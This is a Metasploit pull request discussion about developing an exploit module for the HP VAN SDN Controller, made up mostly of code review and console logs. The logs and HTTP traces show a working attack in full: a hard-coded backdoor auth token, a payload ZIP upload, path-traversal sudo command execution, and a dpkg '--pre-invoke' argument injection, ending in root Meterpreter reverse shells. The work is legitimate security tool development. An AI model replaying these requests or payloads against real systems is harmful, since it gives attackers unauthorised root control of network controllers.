Add HP VAN SDN Controller exploit
rapid7/metasploit-framework pull request #10219
Opened 2018-06-28 07:17 UTC by wvu-r7

# WIP

- [ ] Implement `Linux Dropper` target
- [ ] Implement `check`
- [ ] Rename module?

2018-06-28 07:43 UTC, bcoles commented on modules/exploits/linux/http/hp_van_sdn_controller.rb
> +      'data'    => %Q({"action": "exec", "name": "#{privesc}"})
This will likely die horribly on the server side due to malformed JSON, as per:

```
2.3.0 :001 > privesc = 'hello"thar'
 => "hello\"thar" 
2.3.0 :002 > %Q({"action": "exec", "name": "#{privesc}"})
 => "{\"action\": \"exec\", \"name\": \"hello\"thar\"}" 
2.3.0 :003 > puts %Q({"action": "exec", "name": "#{privesc}"})
{"action": "exec", "name": "hello"thar"}
 => nil 
2.3.0 :004 > 
```

Suggest:

```ruby
'data'    => {
  'action': 'exec',
  'name': privesc.to_s
}.to_json
```

2018-06-28 07:53 UTC, bcoles commented on modules/exploits/linux/http/hp_van_sdn_controller.rb
> +        'Matt Bergin', # Vulnerability discovery
and exploit

2018-06-28 08:35 UTC, bcoles commented on modules/exploits/linux/http/hp_van_sdn_controller.rb
> +  def check
Rudimentary check:

```ruby
def check
  res = send_request_cgi uri => '/'

  if res.nil?
    vprint_error 'Connection failed'
    return CheckCode::Unknown
  end

  if res.code == 401 && res.body.include? 'Missing credentials'
    return CheckCode::Detected
  end

  CheckCode::Safe
end
```

2018-06-28 14:31 UTC, wvu-r7 commented on modules/exploits/linux/http/hp_van_sdn_controller.rb
> +      'data'    => %Q({"action": "exec", "name": "#{privesc}"})
Oof, brain fart. You got me. I should know better, too: https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/http/wordpress_content_injection.rb#L176. :-)

2018-06-28 14:35 UTC, wvu-r7 commented on modules/exploits/linux/http/hp_van_sdn_controller.rb
> +        'Matt Bergin', # Vulnerability discovery
I assume Matt wrote the PoC but wasn't sure if it was a combined KoreLogic effort. I'll add it to Matt's name.

2018-06-28 14:36 UTC, wvu-r7 commented on modules/exploits/linux/http/hp_van_sdn_controller.rb
> +
Interestingly lowercase `Server` header: `server: grizzly/2.2.16`.

2018-06-29 17:37 UTC, bcoles commented on modules/exploits/linux/http/hp_van_sdn_token.rb
> +        'Matt Bergin', # Vulnerability discovery and proof of concept
`exploit`. It's more than a PoC. It works as described and achieves an interactive shell.

2018-06-29 17:37 UTC, bcoles commented on modules/exploits/linux/http/hp_van_sdn_token.rb
> +    elsif res && res.code == 401
I'm lead to believe the service is exploitable post-auth, by specifying a username and password, even without the backdoor key for auth bypass. It would be nice if this exploit module was updated to support this, especially considering the mitigation advice recommended changing the backdoor key.

     HPE expects all customers to update their service token,
     admin token, default sdn user password, and edit iptables as
     described in the guideline. If the guideline was followed,
     the exploit would not be successful.

2018-06-29 17:37 UTC, bcoles commented on modules/exploits/linux/http/hp_van_sdn_token.rb
> +    CheckCode::Unknown
`Safe` would be more applicable.

It would make more sense to check for `res.nil?` immediately following the request, and before the `Appears` / `Safe` conditional.

```ruby
  if res.nil?
    vprint_error 'Connection failed'
    return CheckCode::Unknown
  end
```

That way, any oversights in the aforementioned conditional won't continue execution and result in `Unknown`. [`Unknown` should generally be reserved for instances where the module fails to retrieve enough information from the target machine, such as due to a timeout](https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-check()-method). In this instance there's ample information to at least infer `Detected` / `Safe`.

2018-06-29 17:40 UTC, wvu-r7 commented on modules/exploits/linux/http/hp_van_sdn_token.rb
> +    elsif res && res.code == 401
That's next up.

2018-06-29 17:42 UTC, wvu-r7 commented on modules/exploits/linux/http/hp_van_sdn_token.rb
> +        'Matt Bergin', # Vulnerability discovery and proof of concept
Agreed, changing! The Metasploit terminology tends toward saying "PoC" vs. "module," but the original exploit is no less of an exploit.

2018-06-29 17:45 UTC, wvu-r7 commented on modules/exploits/linux/http/hp_van_sdn_token.rb
> +        'Matt Bergin', # Vulnerability discovery and proof of concept
Maybe we should change our terminology? What about `PoC exploit`?

2018-06-29 17:46 UTC, wvu-r7 commented on modules/exploits/linux/http/hp_van_sdn_token.rb
> +        'Matt Bergin', # Vulnerability discovery and proof of concept
Versus a PoC of the bug being triggered.

2018-06-29 17:58 UTC, bcoles commented
```
msf5 exploit(linux/http/hp_van_sdn_token) > run

[*] Started reverse TCP handler on 10.1.1.197:4444 
[*] Uploading payload ZIP
[+] Uploaded /var/lib/sdn/uploads/c4FBNbcGlhWF7gl9gpu2CgU25j6o1Jm.zip
[*] Waiting for payload to be unzipped...
[*] Executing payload
[*] Executing ../../../../../usr/bin/sudo -u sdn sudo chmod +x /var/lib/sdn/uploads/tmp/8RxmBk5tOeSWNPBf29D9h33rIwG
[*] Executing ../../../../../usr/bin/sudo -u sdn sudo /var/lib/sdn/uploads/tmp/8RxmBk5tOeSWNPBf29D9h33rIwG
[!] This exploit may require manual cleanup of '/var/lib/sdn/uploads/tmp/8RxmBk5tOeSWNPBf29D9h33rIwG' on the target
[!] This exploit may require manual cleanup of '/var/lib/sdn/uploads/c4FBNbcGlhWF7gl9gpu2CgU25j6o1Jm.zip' on the target
[*] Exploit completed, but no session was created.
msf5 exploit(linux/http/hp_van_sdn_token) > sessions

Active sessions
===============

No active sessions.

msf5 exploit(linux/http/hp_van_sdn_token) > check
[*] 10.1.1.177:8081 The target appears to be vulnerable.
msf5 exploit(linux/http/hp_van_sdn_token) > set payload
payload => linux/x86/meterpreter/reverse_tcp
msf5 exploit(linux/http/hp_van_sdn_token) > 
```

2018-06-29 17:59 UTC, wvu-r7 commented on modules/exploits/linux/http/hp_van_sdn_token.rb
> +        'Matt Bergin', # Vulnerability discovery and proof of concept
Nah, KoreLogic's exploit is definitely weaponized. Dropping `PoC` altogether.

2018-06-29 18:00 UTC, bcoles commented on modules/exploits/linux/http/hp_van_sdn_token.rb
> +        'Matt Bergin', # Vulnerability discovery and proof of concept
While a lot of module commentary uses `PoC`, I've traditionally used `exploit` where appropriate, unless the exploit was shit.

I vote for `exploit` in instances where a reliable (or at least easily-configurable) exploit was provided; and `PoC` in instances where a trigger or plain text non-executable PoC (such as a raw HTTP request) was provided. While there may be an area of grey between the two categories, I don't see that `PoC exploit` is any clearer.

Wikipedia's definition doesn't help my argument :

> An exploit (from the English verb to exploit, meaning "to use something to one’s own advantage") is a piece of software, a chunk of data, or a sequence of commands that takes advantage of a bug or vulnerability to cause unintended or unanticipated behavior to occur on computer software, hardware, or something electronic (usually computerized).

2018-06-29 18:09 UTC, wvu-r7 commented
@bcoles: Please run with `HttpTrace` set.

2018-06-29 18:10 UTC, bcoles commented
I think I've broken it.

```
msf5 exploit(linux/http/hp_van_sdn_token) > set httptrace wvu
[-] The following options failed to validate: Value 'wvu' is not valid for option 'HttpTrace'.
httptrace => true
msf5 exploit(linux/http/hp_van_sdn_token) > set httptrace true
httptrace => true
msf5 exploit(linux/http/hp_van_sdn_token) > run

[*] Started reverse TCP handler on 10.1.1.197:4444 
[*] Uploading payload ZIP
********************
####################
# Request:
####################
POST /upload HTTP/1.1
Host: 10.1.1.177:8081
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Filename: 8s8T6aYoXYp32Y00d2BJpPTsVM6d8fejI17Iq.zip
X-Auth-Token: AuroraSdnToken37
Content-Type: application/octet-stream
Content-Length: 321

ӣ3�0�t>�J��� C5F8A965jHS8c8vu0nNGxUNdVRYnzhdc�w�qcddd�&f/���ÄL`�ઁj@�<��d�	00dq����8�98�iCZ�ó
PKwq�L�}�L�� C5F8A965jHS8c8vu0nNGxUNdVRYnzhdcPKN��l�IDw>���g3�����{v���
####################
# Response:
####################
HTTP/1.1 500 Internal Error
Content-Type: text/html;charset=ISO-8859-1
server: grizzly/2.2.16
Date: Fri, 29 Jun 2018 18:09:59 GMT
Connection: close
Transfer-Encoding: chunked

<html><body><h1>Internal Error</h1></body></html>
[-] Exploit aborted due to failure: unknown: Failed to upload /var/lib/sdn/uploads/8s8T6aYoXYp32Y00d2BJpPTsVM6d8fejI17Iq.zip
[*] Exploit completed, but no session was created.
msf5 exploit(linux/http/hp_van_sdn_token) > set payload
payload => linux/x86/meterpreter/reverse_tcp
msf5 exploit(linux/http/hp_van_sdn_token) > run

[*] Started reverse TCP handler on 10.1.1.197:4444 
[*] Uploading payload ZIP
********************
####################
# Request:
####################
POST /upload HTTP/1.1
Host: 10.1.1.177:8081
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Filename: 0ueMqK2RxzGg65S2eJ6KOD61VHzQ9PMEv.zip
X-Auth-Token: AuroraSdnToken37
Content-Type: application/octet-stream
Content-Length: 303

ӣ3�0�t>�J���GJdKZYIDzrCf4SNahTsKtPF�w�qcddd�&f/���ÄL`�ઁj@�<��d�	00dq����8�98�iCZ�ó
PKhq�L�}�L��GJdKZYIDzrCf4SNahTsKtPFPKE�  2�����<�l�IDw>���g3�����{v���
####################
# Response:
####################
HTTP/1.1 500 Internal Error
Content-Type: text/html;charset=ISO-8859-1
server: grizzly/2.2.16
Date: Fri, 29 Jun 2018 18:10:12 GMT
Connection: close
Transfer-Encoding: chunked

<html><body><h1>Internal Error</h1></body></html>
[-] Exploit aborted due to failure: unknown: Failed to upload /var/lib/sdn/uploads/0ueMqK2RxzGg65S2eJ6KOD61VHzQ9PMEv.zip
[*] Exploit completed, but no session was created.
msf5 exploit(linux/http/hp_van_sdn_token) > 
```

2018-06-29 18:12 UTC, bcoles commented
Ok, killed off the Kore shell, and re-ran:

```
msf5 exploit(linux/http/hp_van_sdn_token) > rexploit 
[*] Reloading module...

[*] Started reverse TCP handler on 10.1.1.197:4444 
[*] Uploading payload ZIP
********************
####################
# Request:
####################
POST /upload HTTP/1.1
Host: 10.1.1.177:8081
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Filename: KfH1pv8N0E5h20by155fxhnBy9.zip
X-Auth-Token: AuroraSdnToken37
Content-Type: application/octet-stream
Content-Length: 327

ӣ3�0�t>�J���#AWcRrqwqx9gNpsuV3wppx9gz6Uoac0grBVr�w�qcddd�&f/���ÄL`�ઁj@�<��d�	00dq����8�98�iCZ�ó
PK�q�L�}�L��#AWcRrqwqx9gNpsuV3wppx9gz6Uoac0grBVrPKQ��IDw>���g3�����{v���
####################
# Response:
####################
HTTP/1.1 200 OK
Content-Type: text/plain
server: grizzly/2.2.16
Cache-Control: no-cache, no-store, no-transform, must-revalidate
Expires: Fri, 29 Jun 2018 18:11:27 GMT
Date: Fri, 29 Jun 2018 18:11:27 GMT
Transfer-Encoding: chunked

{ }

[+] Uploaded /var/lib/sdn/uploads/KfH1pv8N0E5h20by155fxhnBy9.zip
[*] Waiting for payload to be unzipped...
[*] Executing payload
[*] Executing ../../../../../usr/bin/sudo -u sdn sudo chmod +x /var/lib/sdn/uploads/tmp/AWcRrqwqx9gNpsuV3wppx9gz6Uoac0grBVr
********************
####################
# Request:
####################
POST / HTTP/1.1
Host: 10.1.1.177:8081
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
X-Auth-Token: AuroraSdnToken37
Content-Type: application/json
Content-Length: 136

{"action":"exec","name":"../../../../../usr/bin/sudo -u sdn sudo chmod +x /var/lib/sdn/uploads/tmp/AWcRrqwqx9gNpsuV3wppx9gz6Uoac0grBVr"}
####################
# Response:
####################
HTTP/1.1 200 OK
Content-Type: text/plain
server: grizzly/2.2.16
Cache-Control: no-cache, no-store, no-transform, must-revalidate
Expires: Fri, 29 Jun 2018 18:11:31 GMT
Date: Fri, 29 Jun 2018 18:11:31 GMT
Content-Length: 0


[*] Executing ../../../../../usr/bin/sudo -u sdn sudo /var/lib/sdn/uploads/tmp/AWcRrqwqx9gNpsuV3wppx9gz6Uoac0grBVr
********************
####################
# Request:
####################
POST / HTTP/1.1
Host: 10.1.1.177:8081
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
X-Auth-Token: AuroraSdnToken37
Content-Type: application/json
Content-Length: 127

{"action":"exec","name":"../../../../../usr/bin/sudo -u sdn sudo /var/lib/sdn/uploads/tmp/AWcRrqwqx9gNpsuV3wppx9gz6Uoac0grBVr"}
####################
# Response:
####################
HTTP/1.1 200 OK
Content-Type: text/plain
server: grizzly/2.2.16
Cache-Control: no-cache, no-store, no-transform, must-revalidate
Expires: Fri, 29 Jun 2018 18:11:31 GMT
Date: Fri, 29 Jun 2018 18:11:31 GMT
Content-Length: 0


[!] This exploit may require manual cleanup of '/var/lib/sdn/uploads/tmp/AWcRrqwqx9gNpsuV3wppx9gz6Uoac0grBVr' on the target
[!] This exploit may require manual cleanup of '/var/lib/sdn/uploads/KfH1pv8N0E5h20by155fxhnBy9.zip' on the target
[*] Exploit completed, but no session was created.
msf5 exploit(linux/http/hp_van_sdn_token) > 
```

2018-06-29 18:15 UTC, wvu-r7 commented on modules/exploits/linux/http/hp_van_sdn_token.rb
> +        'Matt Bergin', # Vulnerability discovery and proof of concept
I agree with your definitions and have traditionally used the same before I worked on Metasploit. I'll realign with the more correct wording. :bowing_man:

2018-06-29 18:49 UTC, wvu-r7 commented on modules/exploits/linux/http/hp_van_sdn_token.rb
> +    CheckCode::Unknown
I'm refactoring the method to offer more nuance. `Unknown` is lazy code for unexplained.

2018-06-29 18:51 UTC, bcoles requested changes
how 2 do i exploit hp van ? run exploit but no meterpreter why ?

2018-06-29 20:11 UTC, wvu-r7 commented on modules/exploits/linux/http/hp_van_sdn_token.rb
> +    CheckCode::Unknown
Actually, with a successful `HttpFingerprint` match, we basically have a precondition for `Detected`.

2018-06-29 20:14 UTC, wvu-r7 commented on modules/exploits/linux/http/hp_van_sdn_token.rb
> +    CheckCode::Unknown
The problem is since `RHOSTS` is now the standard, `check_multiple` is run and swallows up the exception if there's no match, so no check result is returned.

2018-06-29 20:33 UTC, wvu-r7 commented on modules/exploits/linux/http/hp_van_sdn_token.rb
> +    CheckCode::Unknown
See #10229.

2018-06-30 04:20 UTC, bcoles commented on modules/exploits/linux/http/hp_van_sdn_token.rb
> +    CheckCode::Unknown
The HttpFingerprint does not replace the `check` method.

2018-06-30 07:02 UTC, bcoles commented
The `unzip` does not succeed on my system. The payload is never extracted to `/var/lib/sdn/uploads/tmp`.

On my system, the `tmp` directory is writable only by `root`. Is the `unzip` performed as root?

2018-07-01 13:41 UTC, wchen-r7 commented on modules/exploits/linux/http/hp_van_sdn_token.rb
> +    zip = Rex::Zip::Archive.new
Just a suggestion, you could try using this next time:
https://github.com/rapid7/metasploit-framework/wiki/How-to-zip-files-with-Msf::Util::EXE.to_zip

2018-07-02 15:51 UTC, wvu-r7 commented on modules/exploits/linux/http/hp_van_sdn_token.rb
> +    CheckCode::Unknown
That's not the point. The point is `HttpFingerprint`'s error should be printed, not logged, for single hosts.

2018-07-02 15:55 UTC, wvu-r7 commented on modules/exploits/linux/http/hp_van_sdn_token.rb
> +    CheckCode::Unknown
And using `HttpFingerprint` at all with an unsuccessful match neuters the `check` method.

2018-07-02 15:55 UTC, wvu-r7 commented on modules/exploits/linux/http/hp_van_sdn_token.rb
> +    CheckCode::Unknown
This is a regression.

2018-07-02 15:58 UTC, wvu-r7 commented on modules/exploits/linux/http/hp_van_sdn_token.rb
> +    CheckCode::Unknown
And ideally there should not be much overlap between the two facilities. This is the design we're living with but not one we need to preserve.

2018-07-02 16:03 UTC, wvu-r7 commented on modules/exploits/linux/http/hp_van_sdn_token.rb
> +    CheckCode::Unknown
I'd go a step further and say an ideal check facility would obsolete `HttpFingerprint`.

2018-07-02 17:55 UTC, wvu-r7 commented on modules/exploits/linux/http/hp_van_sdn_token.rb
> +    zip = Rex::Zip::Archive.new
Lol, I totally forgot about it: #6999. Thanks!

2018-07-02 19:33 UTC, wvu-r7 commented
@bcoles: Figured it out. The Kore exploit creates the temp directory manually, and the `install` action runs as root. So running the Python exploit borks the ZIP extraction functionality.

2018-07-02 19:35 UTC, wvu-r7 commented
The irony is that's why I thought it was pure command execution at first. I didn't need to create the temp dir for the directory traversal to succeed. Testing a clean install revealed there was more to it, so that's when I started RCA.

2018-07-02 19:57 UTC, wvu-r7 commented
I've got an idea I've been spinning on since Friday. I was able to bypass the file extension check and upload the payload as a fake ZIP file. I'm also thinking I'll just run the chained `sudo` commands directly in the shell session for now.

2018-07-02 20:51 UTC, wvu-r7 commented
Nope, the ZIP needs to be real for `unzip -d` to create the temp dir. Back to the drawing board. I'm beginning to think Kore's approach was superior from the start.

2018-07-02 21:56 UTC, wvu-r7 commented
```
[pid  8054] execve("./uninstall-dpkg", ["./uninstall-dpkg", "--pre-invoke=touch${IFS}/tmp/test"], [/* 21 vars */]) = 0
Process 8055 attached
[pid  8055] execve("/usr/bin/nohup", ["/usr/bin/nohup", "sudo", "dpkg", "-r", "--pre-invoke=touch${IFS}/tmp/test"], [/* 21 vars */]) = 0
[pid  8055] execve("/usr/local/sbin/sudo", ["sudo", "dpkg", "-r", "--pre-invoke=touch${IFS}/tmp/test"], [/* 21 vars */]) = -1 ENOENT (No such file or directory)
[pid  8055] execve("/usr/local/bin/sudo", ["sudo", "dpkg", "-r", "--pre-invoke=touch${IFS}/tmp/test"], [/* 21 vars */]) = -1 ENOENT (No such file or directory)
[pid  8055] execve("/usr/bin/sudo", ["sudo", "dpkg", "-r", "--pre-invoke=touch${IFS}/tmp/test"], [/* 21 vars */]) = 0
Process 8056 attached
[pid  8056] execve("/usr/bin/dpkg", ["dpkg", "-r", "--pre-invoke=touch${IFS}/tmp/test"], [/* 12 vars */]) = 0
Process 8057 attached
[pid  8057] execve("/bin/sh", ["sh", "-c", "touch${IFS}/tmp/test"], [/* 14 vars */]) = 0
Process 8058 attached
[pid  8058] execve("/usr/bin/touch", ["touch", "/tmp/test"], [/* 15 vars */]) = 0
```

```
-rw-r--r-- 1 root root 0 Jul  2 14:48 /tmp/test
```

I think I found a better vector.

2018-07-02 23:03 UTC, wvu-r7 commented
So interesting thing: I neglected to mention (and subsequently forgot) that the temp dir is `rm -rf`'d before the `unzip`, and the `sdnadmin` user owns the parent dir. Even if the temp dir is root-owned, it can still be removed.

```
msf5 exploit(linux/http/hp_van_sdn_token) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Uploading payload ZIP
[+] Uploaded /var/lib/sdn/uploads/VSn8vk3pbCzy1lUbK1zz4nCHiyHHJwHnAP6pohC.zip
[*] Waiting for payload to be unzipped...
[*] Executing payload
[*] Executing ../../../../../usr/bin/sudo -u sdn sudo chmod +x /var/lib/sdn/uploads/tmp/4GzwmnI86k5v1N5W7di9MdWIF
[*] Executing ../../../../../usr/bin/sudo -u sdn sudo /var/lib/sdn/uploads/tmp/4GzwmnI86k5v1N5W7di9MdWIF
[*] Sending stage (812100 bytes) to 192.168.56.102
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.102:42558) at 2018-07-02 17:58:53 -0500
[+] Deleted /var/lib/sdn/uploads/tmp/4GzwmnI86k5v1N5W7di9MdWIF
[+] Deleted /var/lib/sdn/uploads/VSn8vk3pbCzy1lUbK1zz4nCHiyHHJwHnAP6pohC.zip

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 192.168.56.102
OS           : Debian 8 (Linux 4.4.0-2-amd64-hlinux)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
```

```
root@medium-hLinux:/var/lib/sdn/uploads# ls -la
total 12
drwxrwx--- 3 sdn  sdn  4096 Jul  2 15:58 .
drwxrwx--- 8 sdn  sdn  4096 Sep 11  2016 ..
drwxr-xr-x 2 root root 4096 Jul  2 15:58 tmp
root@medium-hLinux:/var/lib/sdn/uploads# ls -la
total 12
drwxrwx--- 3 sdn      sdn 4096 Jul  2 15:58 .
drwxrwx--- 8 sdn      sdn 4096 Sep 11  2016 ..
drwxrwx--- 2 sdnadmin sdn 4096 Jul  2 15:58 tmp
root@medium-hLinux:/var/lib/sdn/uploads#
```

2018-07-02 23:04 UTC, wvu-r7 commented
So interesting thing: I neglected to mention (and subsequently forgot) that the temp dir is `rm -rf`'d before the `unzip`, and the `sdn` user owns the parent dir. Even if the temp dir is root-owned, it can still be removed.

```
msf5 exploit(linux/http/hp_van_sdn_token) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Uploading payload ZIP
[+] Uploaded /var/lib/sdn/uploads/VSn8vk3pbCzy1lUbK1zz4nCHiyHHJwHnAP6pohC.zip
[*] Waiting for payload to be unzipped...
[*] Executing payload
[*] Executing ../../../../../usr/bin/sudo -u sdn sudo chmod +x /var/lib/sdn/uploads/tmp/4GzwmnI86k5v1N5W7di9MdWIF
[*] Executing ../../../../../usr/bin/sudo -u sdn sudo /var/lib/sdn/uploads/tmp/4GzwmnI86k5v1N5W7di9MdWIF
[*] Sending stage (812100 bytes) to 192.168.56.102
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.102:42558) at 2018-07-02 17:58:53 -0500
[+] Deleted /var/lib/sdn/uploads/tmp/4GzwmnI86k5v1N5W7di9MdWIF
[+] Deleted /var/lib/sdn/uploads/VSn8vk3pbCzy1lUbK1zz4nCHiyHHJwHnAP6pohC.zip

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 192.168.56.102
OS           : Debian 8 (Linux 4.4.0-2-amd64-hlinux)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
```

```
root@medium-hLinux:/var/lib/sdn/uploads# ls -la
total 12
drwxrwx--- 3 sdn  sdn  4096 Jul  2 15:58 .
drwxrwx--- 8 sdn  sdn  4096 Sep 11  2016 ..
drwxr-xr-x 2 root root 4096 Jul  2 15:58 tmp
root@medium-hLinux:/var/lib/sdn/uploads# ls -la
total 12
drwxrwx--- 3 sdn      sdn 4096 Jul  2 15:58 .
drwxrwx--- 8 sdn      sdn 4096 Sep 11  2016 ..
drwxrwx--- 2 sdnadmin sdn 4096 Jul  2 15:58 tmp
root@medium-hLinux:/var/lib/sdn/uploads#
```

2018-07-02 23:09 UTC, wvu-r7 commented
So interesting thing: I neglected to mention (and subsequently forgot) that the temp dir is `rm -rf`'d before the `unzip`, and the `sdn` user owns the parent dir. Even if the temp dir is root-owned, it can still be removed and recreated (unless the files within are root-owned). Note that the new temp dir is owned by `sdnadmin`, though.

```
msf5 exploit(linux/http/hp_van_sdn_token) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Uploading payload ZIP
[+] Uploaded /var/lib/sdn/uploads/VSn8vk3pbCzy1lUbK1zz4nCHiyHHJwHnAP6pohC.zip
[*] Waiting for payload to be unzipped...
[*] Executing payload
[*] Executing ../../../../../usr/bin/sudo -u sdn sudo chmod +x /var/lib/sdn/uploads/tmp/4GzwmnI86k5v1N5W7di9MdWIF
[*] Executing ../../../../../usr/bin/sudo -u sdn sudo /var/lib/sdn/uploads/tmp/4GzwmnI86k5v1N5W7di9MdWIF
[*] Sending stage (812100 bytes) to 192.168.56.102
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.102:42558) at 2018-07-02 17:58:53 -0500
[+] Deleted /var/lib/sdn/uploads/tmp/4GzwmnI86k5v1N5W7di9MdWIF
[+] Deleted /var/lib/sdn/uploads/VSn8vk3pbCzy1lUbK1zz4nCHiyHHJwHnAP6pohC.zip

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 192.168.56.102
OS           : Debian 8 (Linux 4.4.0-2-amd64-hlinux)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
```

```
root@medium-hLinux:/var/lib/sdn/uploads# ls -la
total 12
drwxrwx--- 3 sdn  sdn  4096 Jul  2 15:58 .
drwxrwx--- 8 sdn  sdn  4096 Sep 11  2016 ..
drwxr-xr-x 2 root root 4096 Jul  2 15:58 tmp
root@medium-hLinux:/var/lib/sdn/uploads# ls -la
total 12
drwxrwx--- 3 sdn      sdn 4096 Jul  2 15:58 .
drwxrwx--- 8 sdn      sdn 4096 Sep 11  2016 ..
drwxrwx--- 2 sdnadmin sdn 4096 Jul  2 15:58 tmp
root@medium-hLinux:/var/lib/sdn/uploads#
```

```
msf5 exploit(linux/http/hp_van_sdn_token) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Uploading payload ZIP
[+] Uploaded /var/lib/sdn/uploads/UY0GYifofjIFK1xoK5kuZE3VYKhG.zip
[*] Waiting for payload to be unzipped...
[*] Executing payload
[*] Executing ../../../../../usr/bin/sudo -u sdn sudo chmod +x /var/lib/sdn/uploads/tmp/e4f7WrJRzjeKFDdq1wyzmYeQnsRVW5eIOQNhgr
[*] Executing ../../../../../usr/bin/sudo -u sdn sudo /var/lib/sdn/uploads/tmp/e4f7WrJRzjeKFDdq1wyzmYeQnsRVW5eIOQNhgr
[!] This exploit may require manual cleanup of '/var/lib/sdn/uploads/tmp/e4f7WrJRzjeKFDdq1wyzmYeQnsRVW5eIOQNhgr' on the target
[!] This exploit may require manual cleanup of '/var/lib/sdn/uploads/UY0GYifofjIFK1xoK5kuZE3VYKhG.zip' on the target
[*] Exploit completed, but no session was created.
msf5 exploit(linux/http/hp_van_sdn_token) >
```

```
root@medium-hLinux:/var/lib/sdn/uploads# ls -laR
.:
total 12
drwxrwx--- 3 sdn  sdn  4096 Jul  2 16:07 .
drwxrwx--- 8 sdn  sdn  4096 Sep 11  2016 ..
drwxr-xr-x 2 root root 4096 Jul  2 16:07 tmp

./tmp:
total 8
drwxr-xr-x 2 root root 4096 Jul  2 16:07 .
drwxrwx--- 3 sdn  sdn  4096 Jul  2 16:07 ..
-rw-r--r-- 1 root root    0 Jul  2 16:07 test
root@medium-hLinux:/var/lib/sdn/uploads# ls -laR
.:
total 16
drwxrwx--- 3 sdn      sdn  4096 Jul  2 16:08 .
drwxrwx--- 8 sdn      sdn  4096 Sep 11  2016 ..
-rw-rw---- 1 sdnadmin sdn   339 Jul  2 16:08 UY0GYifofjIFK1xoK5kuZE3VYKhG.zip
drwxr-xr-x 2 root     root 4096 Jul  2 16:07 tmp

./tmp:
total 8
drwxr-xr-x 2 root root 4096 Jul  2 16:07 .
drwxrwx--- 3 sdn  sdn  4096 Jul  2 16:08 ..
-rw-r--r-- 1 root root    0 Jul  2 16:07 test
root@medium-hLinux:/var/lib/sdn/uploads#
```

2018-07-02 23:19 UTC, wvu-r7 commented
So interesting thing: I neglected to mention (and subsequently forgot) that the temp dir is `rm -rf`'d before the `unzip`, and the `sdn` group can write to the parent dir. Even if the temp dir is root-owned, it can still be removed and recreated (unless the files within are root-owned). Note that the new temp dir is owned by `sdnadmin`, though.

```
msf5 exploit(linux/http/hp_van_sdn_token) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Uploading payload ZIP
[+] Uploaded /var/lib/sdn/uploads/VSn8vk3pbCzy1lUbK1zz4nCHiyHHJwHnAP6pohC.zip
[*] Waiting for payload to be unzipped...
[*] Executing payload
[*] Executing ../../../../../usr/bin/sudo -u sdn sudo chmod +x /var/lib/sdn/uploads/tmp/4GzwmnI86k5v1N5W7di9MdWIF
[*] Executing ../../../../../usr/bin/sudo -u sdn sudo /var/lib/sdn/uploads/tmp/4GzwmnI86k5v1N5W7di9MdWIF
[*] Sending stage (812100 bytes) to 192.168.56.102
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.102:42558) at 2018-07-02 17:58:53 -0500
[+] Deleted /var/lib/sdn/uploads/tmp/4GzwmnI86k5v1N5W7di9MdWIF
[+] Deleted /var/lib/sdn/uploads/VSn8vk3pbCzy1lUbK1zz4nCHiyHHJwHnAP6pohC.zip

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 192.168.56.102
OS           : Debian 8 (Linux 4.4.0-2-amd64-hlinux)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
```

```
root@medium-hLinux:/var/lib/sdn/uploads# ls -la
total 12
drwxrwx--- 3 sdn  sdn  4096 Jul  2 15:58 .
drwxrwx--- 8 sdn  sdn  4096 Sep 11  2016 ..
drwxr-xr-x 2 root root 4096 Jul  2 15:58 tmp
root@medium-hLinux:/var/lib/sdn/uploads# ls -la
total 12
drwxrwx--- 3 sdn      sdn 4096 Jul  2 15:58 .
drwxrwx--- 8 sdn      sdn 4096 Sep 11  2016 ..
drwxrwx--- 2 sdnadmin sdn 4096 Jul  2 15:58 tmp
root@medium-hLinux:/var/lib/sdn/uploads#
```

```
msf5 exploit(linux/http/hp_van_sdn_token) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Uploading payload ZIP
[+] Uploaded /var/lib/sdn/uploads/UY0GYifofjIFK1xoK5kuZE3VYKhG.zip
[*] Waiting for payload to be unzipped...
[*] Executing payload
[*] Executing ../../../../../usr/bin/sudo -u sdn sudo chmod +x /var/lib/sdn/uploads/tmp/e4f7WrJRzjeKFDdq1wyzmYeQnsRVW5eIOQNhgr
[*] Executing ../../../../../usr/bin/sudo -u sdn sudo /var/lib/sdn/uploads/tmp/e4f7WrJRzjeKFDdq1wyzmYeQnsRVW5eIOQNhgr
[!] This exploit may require manual cleanup of '/var/lib/sdn/uploads/tmp/e4f7WrJRzjeKFDdq1wyzmYeQnsRVW5eIOQNhgr' on the target
[!] This exploit may require manual cleanup of '/var/lib/sdn/uploads/UY0GYifofjIFK1xoK5kuZE3VYKhG.zip' on the target
[*] Exploit completed, but no session was created.
msf5 exploit(linux/http/hp_van_sdn_token) >
```

```
root@medium-hLinux:/var/lib/sdn/uploads# ls -laR
.:
total 12
drwxrwx--- 3 sdn  sdn  4096 Jul  2 16:07 .
